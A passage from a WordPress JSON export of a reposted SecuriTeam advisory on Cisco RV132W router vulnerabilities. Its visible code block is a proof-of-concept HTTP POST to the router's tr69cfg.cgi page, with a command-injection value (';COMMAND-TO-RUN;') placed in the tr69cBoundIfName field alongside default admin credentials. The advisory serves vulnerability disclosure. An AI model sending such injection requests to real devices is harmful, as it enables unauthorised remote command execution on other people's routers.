crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ===  POST \/tr69cfg.cgi HTTP\/1.1  Host: 192.168.1.1  User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko\/2010010  1 Firefox\/54.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  Content-Type: application\/x-www-form-urlencoded  Content-Length: 627  Referer: http:\/\/192.168.1.1\/tr69cfg.cgi  Connection: close  Upgrade-Insecure-Requests: 1    submit_button=Basic_config&amp;tr69cEnable=1&amp;tr69cInformEnable=1&amp;ipvEnable=0&amp;tr69cInformInterval=300&amp;tr69cAcsURL=http%3A%2F%2F192.168.1.1&amp;tr69cAcsUser=admin&amp;tr69cAcsPwd=admin&amp;tr69cConnReqUser=admin&amp;tr69cConnReqPwd=admin&amp;tr69cConnReqPort=7547&amp;tr69cNoneConnReqAuth=0&amp;tr69cDebugEnable=0&amp;tr69cAcsCert=&amp;tr69cCpeCert=&amp;downloadFileType=&amp;tr69cBoundIfName=;COMMAND-TO-RUN;&amp;tr69cBindInterface=ETH_WAN_R&amp;tr69=on&amp;ipv=on&amp;inform=on&amp;informInterval=300&amp;httpCategory=http%3A%2F%2F&amp;acsURL=192.168.1.1&amp;acsUser=admin&amp;acsPwd=admin&amp;debug=on&amp;FileType=on&amp;connReqAuth=on&amp;connReqUser=admin&amp;connReqPwd=admin&amp;connReqPort=7547&amp;WANInterface=eth0.1  ===<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div 
class=\"crayon-num\"><\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<pre class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">===\nPOST \/tr69cfg.cgi HTTP\/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko\/20100101 Firefox\/54.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 627\nReferer: http:\/\/192.168.1.1\/tr69cfg.cgi\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n
submit_button=Basic_config&amp;tr69cEnable=1&amp;tr69cInformEnable=1&amp;ipvEnable=0&amp;tr69cInformInterval=300&amp;tr69cAcsURL=http%3A%2F%2F192.168.1.1&amp;tr69cAcsUser=admin&amp;tr69cAcsPwd=admin&amp;tr69cConnReqUser=admin&amp;tr69cConnReqPwd=admin&amp;tr69cConnReqPort=7547&amp;tr69cNoneConnReqAuth=0&amp;tr69cDebugEnable=0&amp;tr69cAcsCert=&amp;tr69cCpeCert=&amp;downloadFileType=&amp;tr69cBoundIfName=;COMMAND-TO-RUN;&amp;tr69cBindInterface=ETH_WAN_R&amp;tr69=on&amp;ipv=on&amp;inform=on&amp;informInterval=300&amp;httpCategory=http%3A%2F%2F&amp;acsURL=192.168.1.1&amp;acsUser=admin&amp;acsPwd=admin&amp;debug=on&amp;FileType=on&amp;connReqAuth=on&amp;connReqUser=admin&amp;connReqPwd=admin&amp;connReqPort=7547&amp;WANInterface=eth0.1\n===<\/pre>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"printfriendly 
pf-alignleft\"><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3590\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 11 Feb 2018 06:10:03 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in Cisco RV132W Wireless N VPN version 1.0.1.8 The Cisco RV132W Wireless-N ADSL2+ VPN Router is &#8220;easy to use, set up, and deploy. 
This flexible router offers great performance and is suited for small or home offices (SOHO) and smaller deployments.&#8221; The vulnerabilities found are: &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3590\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Hack2Win &#8211;  Cisco RV132W Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12603,12135,11851,10757,12136],"class_list":["post-11439","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-hack2win","tag-information-disclosure","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11439","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11439"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11439\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11439"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11439"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11439"
}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}